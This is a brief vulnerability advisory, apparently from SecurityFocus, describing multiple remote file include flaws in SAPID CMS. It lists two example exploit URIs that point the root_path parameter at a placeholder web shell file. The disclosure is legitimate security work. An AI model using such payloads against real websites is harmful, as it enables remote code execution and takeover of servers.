SAPID CMS Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
http://www.example.com/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]


 

Privacy Statement
Copyright 2010, SecurityFocus